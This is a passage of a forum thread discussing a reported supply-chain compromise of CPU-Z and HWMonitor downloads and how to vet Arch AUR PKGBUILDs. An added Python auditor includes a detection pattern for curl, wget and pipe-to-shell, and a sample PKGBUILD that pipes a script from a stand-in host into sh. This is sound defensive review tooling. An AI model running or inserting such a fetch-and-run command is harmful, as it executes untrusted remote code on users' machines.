
Posted by pashadee 8 hours ago

CPU-Z and HWMonitor compromised (www.theregister.com)
https://xcancel.com/vxunderground/status/2042483067655262461

https://old.reddit.com/r/pcmasterrace/comments/1sh4e5l/warni...

https://www.bleepingcomputer.com/news/security/supply-chain-...

169 points | 73 comments | page 2
kevincloudsec 7 hours ago|
same threat group hit filezilla last month. they're specifically targeting utilities that tech-savvy users trust and download from official sources. the attack surface is the api layer that generates download links, not the binary itself
moomoo11 2 hours ago||
One interesting thing about all this stuff is that we may see a big swing towards paid/trusted solutions for all these types of things.

Maybe the 5-10% of true nerds will go find the l33t open source solutions, but most people will just use some paid solution.

Maybe Steam could build. Or in Windows. Or some SaaS solution for registry.

In exchange you just share your HW info

cachius 6 hours ago||
Grok post linking further sources: https://x.com/i/grok/share/3b870ceb9b424c01bf89afbe0de3bd81
BoredPositron 5 hours ago||
"Bug fixes and general improvements."

Supply chain attacks are easier because changelogs for most software are useless now if they are provided at all.

unethical_ban 6 hours ago||
I've wondered about this while using CachyOS and their package installer. I don't know what repos do what, I don't really understand the security model of the AUR, and I wonder, if I download a package, how can I know it's legitimate or otherwise by some trusted user of the community vs. some random person?
cephi 6 hours ago|
To provide some quick information (I implore others to correct me here):

- CachyOS packages should be coming from known, trusted CachyOS and Arch Linux maintainers. There is still potential for them or their original packages to get compromised (see XZ backdoor); however, they are pulling source code from trusted sources, so you can generally trust these as much as you trust the OS itself.

- AUR packages are a complete wild west. AUR packages are defined by PKGBUILD files and I highly recommend learning how to read PKGBUILDs and always reading them before installation and re-reading them when they are updated. PKGBUILDs for AUR packages can be treated as untrusted shell scripts and to a certain extent an arbitrary actor can make and upload any PKGBUILD to the AUR. Feel free to use them, but make sure A) they are downloading from trusted sources like the original git repo and B) they are running commands that are expected.

EDIT: Improved accuracy.
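
The two PKGBUILD checks from the comment above (where sources are downloaded from, and which commands run), as an added example that is not part of the thread or any project's own tooling. The `TRUSTED_HOSTS` allowlist, the `array` and `audit` helpers and the sample PKGBUILD are assumptions constructed for illustration; the file is read as text and never sourced, since sourcing an untrusted PKGBUILD would execute it.

```python
import re
from urllib.parse import urlparse

# Assumption: hosts the reviewer has chosen to trust for this package.
TRUSTED_HOSTS = {"github.com", "gitlab.com"}
# Commands worth a second look inside prepare()/build()/package().
RISKY = re.compile(r"\b(curl|wget|base64|eval|sudo)\b|\|\s*(ba)?sh\b")

# Constructed PKGBUILD for illustration; not a real AUR package.
SAMPLE = r'''
pkgname=hwinfo-tool
pkgver=1.2.3
source=("$pkgname-$pkgver.tar.gz::https://github.com/example/hwinfo-tool/archive/v$pkgver.tar.gz"
        "helper.bin::https://cdn.example-mirror.net/helper.bin")
sha256sums=('<constructed-sha256>'
            'SKIP')
package() {
  make DESTDIR="$pkgdir" install
  curl -s https://cdn.example-mirror.net/post.sh | sh
}
'''

def array(text, name):
    """Quoted entries of a bash array such as source=(...), read as text only."""
    m = re.search(rf"^{name}=\((.*?)\)", text, re.S | re.M)
    return re.findall(r"""["']([^"']+)["']""", m.group(1)) if m else []

def audit(text):
    findings, sums = [], array(text, "sha256sums")
    for i, entry in enumerate(array(text, "source")):
        host = urlparse(entry.split("::", 1)[-1]).hostname  # drop "name::" prefix
        if host and host not in TRUSTED_HOSTS:
            findings.append(f"source from unlisted host: {host}")
        if i >= len(sums) or sums[i] == "SKIP":
            findings.append(f"no checksum for: {entry.split('::')[0]}")
    func = None
    for n, line in enumerate(text.splitlines(), 1):
        start = re.match(r"(\w+)\(\)\s*\{", line)
        if start:
            func = start.group(1)
        elif line.startswith("}"):
            func = None
        elif func and RISKY.search(line):
            findings.append(f"{func}() line {n}: {line.strip()}")
    return findings

if __name__ == "__main__":
    print("\n".join(audit(SAMPLE)))
```

`SKIP` is normal for VCS sources such as git checkouts, so that finding is a prompt to check which commit or tag is pinned rather than proof of tampering.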

wang_li 7 hours ago||
Jesus. I see that post and comment section and I immediately expect to hear Joey telling me about how this ATM in Idaho started spraying cash after his hack of the Gibson. That is a real-life reproduction of the perception of hackers in films in the '90s.
daneel_w 4 hours ago||
And CSI: Miami, which kept the vibe alive through the 2000s and "educated the masses" on how IT works. Beep boop, I'm in.
vntok 3 hours ago||
The counter-hacker double-keyboarding sequence was inspiring.
vntok 6 hours ago|||
From the thread:

> Q: Why the heck did you hyperlink [the malware installer]?

> A: If someone reads this and they still click the download then they kind of deserve the virus tbh

metalliqaz 6 hours ago||
someone has some l33t sk1llz